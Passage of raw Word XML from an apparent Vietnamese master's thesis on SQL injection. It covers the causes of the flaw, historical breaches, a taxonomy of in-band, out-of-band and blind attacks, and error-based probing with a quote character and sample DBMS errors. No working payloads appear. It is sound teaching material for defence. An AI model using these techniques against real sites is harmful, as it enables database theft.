        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">toàn. Nếu không có một sự hiểu biết về các hệ quản trị CSDL, nhận thức về các vấn đề bảo mật, LTV có thể làm ra một ứng dụng mắc lỗi SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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Các nguyên nhân dẫn đến việc tạo ra câu lệnh SQL không an toàn có thể là:</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ểm soát ký tự Escape.</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ểm soát loại dữ liệu.</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ểm soát quá trình sinh câu lệnh SQL.</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Không kiếm soát thông báo lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu không kiểm soát chặt quá trình sinh câu lệnh này, kẻ tấn công hoàn toàn có thể tạo ra câu lệnh SQL và thực thi trên máy chủ CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00945280">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc459822489"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ảnh hưởng của lỗ hổng SQL injection với tổ chức.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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trị mức ứng dụng để từ đó chiếm quyền điều khiển ứng dụng, thực thi trái phép các hành vi không được phép.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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theo hướng này, kẻ tấn công hoàn toàn có thể chiếm quyền điều khiển hoàn toàn máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Một số nguồn trên thế giới có thể cho thấy sự ảnh hưởng của lỗ hổng SQL injection. Năm 2011, CWE (Common Weakness Enumeration)/SANS Top 25 Most Dangerous Software Errors là một danh sách thống kê các lỗ hổng nghiêm </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>trọng nhất của phần mềm. Danh sách được tổng hợp từ hơn 20 nguồn khác nhau, sử dụng cơ chế Common Weakness Scoring System (CWSS) để chấm điểm. Vào năm 2011, lỗ hổng SQL injection đứng đầu danh sách (</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://cwe.mitre.org/top25/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngoài ra, Open Web Application Security Project (OWASP) cũng liệt kê lỗi nhúng mã (bao gồm SQL injection) là lỗ hổng bảo mật nghiêm trọng nhất trong top 10 lỗ hổng ứng dụng web năm 2010. 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Tuy nhiên, vào năm 2010 khi thay đổi cách tính điểm dựa trên ảnh hưởng/nguy cơ rủi ro, lỗ hổng SQL injection đã lên đầu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Một nguồn khác, đó là thông tin các website bị tấn công được thống kê trên Zone-H. Một lượng lớn các trang web bị tấn công khai thác bằng lỗ hổng SQL injection. Giới truyền thông cũng có nhiều công bố về các vụ tấn công ảnh hưởng đến các công ty, tổ chức lớn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 2/2002, Jeremiah Jacks (</w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.securityfocus.com/news/346</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) phát hiện lỗ hổng SQL injection của Guess.com, thu được ít nhất thông tin thẻ tín dụng của 200,000 khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 6/2003, Jeremiah Jacks tiếp tục tấn công PetCo.com (</w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.securityfocus.com/news/6194</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), thu được thông tin thẻ tín dụng của 500.000 khách hàng qua lỗ hổng SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ngày 17 tháng 6 năm 2005, Master Card cảnh báo khách hàng có sự vi phạm bảo mật trong hệ thống Card Systems Solutions, đây cũng là vụ tấn công lớn nhất được ghi nhận liên quan đến SQL injection (</w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.ftc.gov/os/caselist/0523148/0523148complaint.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), kẻ tấn công đã tiếp cận hơn 40 triệu thẻ tín dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tháng 8 năm 2007, United Nations Web site (</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="3152A9"/>
        </w:rPr>
        <w:t>www.un.org</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) bị thay đổi giao diện thông qua lỗ hổng SQL injection, hiển thị thông điệp bài Mỹ (</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://news.cnet.com/8301-10784_3-9758843-7.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 2 năm 2009, một nhóm hacker Rumai sử dụng lỗ hổng SQL injection khai thác Web sites Kaspersky, F-Secure, và Bit-Defender. Nhóm hacker này cũng đã từng tấn công các website lớn như: RBS WorldPay, CNET.com, BT.com, Tiscali.co.uk, và national-lottery.co.uk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 4 năm 2011, Barracuda Networks Web site (barracudanetworks.com) mắc lỗ hổng SQL injection, toàn bộ CSDL bị công khai gồm cả thông tin đăng nhập và mật khẩu đã mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 5 năm 2011, LuzSec chiếm quyền một loạt website của Sony (sonypictures.com, SonyMusic.gr, and SonyMusic.co.jp). LulzSec tuyên bố có thể mật khẩu, email hàng triệu khách hàng của Sony</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nếu như trước đây, các hacker thường chiếm quyền điều khiển Website để ghi điểm với các nhóm hacker khác, hoặc truyền bá, để lại một tin nhắn cụ thể. Tuy nhiên, ngày nay các hacker khai thác với mục đích cụ thể, thường là tài chính. Việc tấn công ngày càng được thực hiện âm thầm, lặng lẽ. Đồng nghĩa với đó là hậu quả của tấn công ngày càng nghiêm trọng. Trong phần tiế</w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>p theo, luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ đi sâu vào một kiểu khai thác lỗ hổng SQL injection nói chung, và khai thác kiểu Blind SQL injection nói riêng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="000A795D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc459822490"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Khai thác lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Một câu hỏi được đặt ra là: Sau khi xác định được một vị trí – đầu vào (EntryPoint) mắc lỗi, cần phải làm gì với nó ? Khi đó, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoàn toàn có thể tương tác được với CSDL. Trong nhiều năm qua, đã có nhiều phương pháp, nghiên cứu về cách để khai thác (Exploit) lỗ hổng SQL injection. Trong phần này sẽ trình bày các kỹ thuật cho phép, hoặc lấy thông tin từ CSDL cho trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00945280">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc458409268"/>
      <w:bookmarkStart w:id="16" w:name="_Toc458409338"/>
      <w:bookmarkStart w:id="17" w:name="_Toc458433464"/>
      <w:bookmarkStart w:id="18" w:name="_Toc459373881"/>
      <w:bookmarkStart w:id="19" w:name="_Toc459373941"/>
      <w:bookmarkStart w:id="20" w:name="_Toc459374314"/>
      <w:bookmarkStart w:id="21" w:name="_Toc459822491"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>Phân biệt các hình thức tấn công SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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theo 2 tiêu chí:</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Cách để nhận được kết quả trả về của truy vấn SQL.</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Cách để lấy được thông tin từ kết quả trả về.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao lại phân chia như vậy ? Trong ví dụ ở phần trên đã trình bày về hai ví dụ ứng dụng mắc lỗi SQL injection. Tuy vậy, đó là những ví dụ cơ bản, và đơn giản nhất. Trong thực tế, có nhiều trường hợp các vị trí mắc lỗi khá khó khăn để lấy được dữ liệu, kết quả trả về của truy vấn SQL. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">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theo cách truyền thống thì không thể nào nhận được dữ liệu trả về. Chính vì thế, dựa vào cách mà người d</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ù</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ng nhận kết quả truy vấn SQL trả về, có thể chia làm hai dạng: Tấn công dạng In of Band và Tấn công Out of Band.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công dạng In of Band là dạng tấn công cơ bản mà </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ đi sâu phân tích: Kết quả trả truy vấn SQL trả về trực tiếp cho trình duyệt của người dùng. Thực hiện phân tích thông tin mà trình duyệt nhận được, kẻ tấn công có thể trích xuất ra được các thông tin mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công dạng Out of Band ngược lại với In of Band. Kết quả của truy vấn không trả về trực tiếp cho trình duyệt của người dùng. Để có thể nhận được </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kết quả truy vấn, kẻ tấn công sẽ phải sử dụng kỹ thuật để nhận kết quả này, qua một kênh khác: Qua đọc ghi file, qua truy vấn HTTP/ truy vấn DNS… Trong phần tiếp theo sẽ trình bày chi tiết hơn về loại hình tấn công này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khi mà đã nhận được kết quả trả về của truy vấn SQL, thì một vấn đề tiếp theo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 Có nhiều kỹ thuật để trích xuất, lấy thông tin. Tuy nhiên, việc sử dụng kỹ thuật nào lại phụ thuộc vào cách mà lớp logic xử lý và hiển thị kết quả của câu truy vấn SQL. Thông thường các kỹ thuật cơ bản là:</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Sử dụng thông báo lỗi (Error Message).</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Sử dụng mệnh đề UNION.</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Tấn công Blind SQL injection sử dụng mệnh đề điều kiện.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong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rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong phần tiếp theo sẽ lần lượt đi vào cụ thể của các dạng tấn công đã nói ở trên. Đầu tiên là hai dạng tấn đơn giản, và cơ bản nhất: Tấn công non-blind sử dụng thông báo lỗi và mệnh đề UNION. Tiếp theo, sẽ trình bày về tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Out-of-band. Về các kỹ thuật tấn công Blind SQL injection cơ bản, trong mục 3 của chương sẽ đi sâu về vấn đề này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc459822492"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tấn công sử dụng thông báo lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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Lợi dụng điểm này, kẻ tấn công có thể sử dụng để trích xuất thông tin trong CSDL. Cần lưu ý là: vì thông báo lỗi là của DBMS, nên sẽ phụ thuộc vào loại DBMS sử dụng: MySQL một kiểu, MSSQL Server một kiểu, và Oracle một kiểu khác.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong ví dụ sau đây, ứng dụng hiển thị chi tiết về thông tin lỗi. Sau khi thêm một dấu nháy đơn (‘) vào biến trên URL, câu lệnh SQL được sinh ra sẽ trở nên sai cú pháp vì thừa 1 dấu nháy đơn, dẫn đến không đóng được chuỗi và tạo ra thông báo lỗi cú pháp (syntax error). Vì sử dụng DBMS là Microsoft SQL Server nên thông báo sẽ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745A4666" wp14:editId="464BA832">
            <wp:extent cx="5476875" cy="17526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2"/>
                    <a:srcRect r="8287" b="8148"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5476875" cy="175260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3" w:name="_Toc459819430"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Thông báo lỗi của MSSQL Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong trường hợp DBMS sử dụng MySQL Server, thông báo lỗi có dạng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ERROR 1064 (42000): You have an error in your SQL syntax; check the manual</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
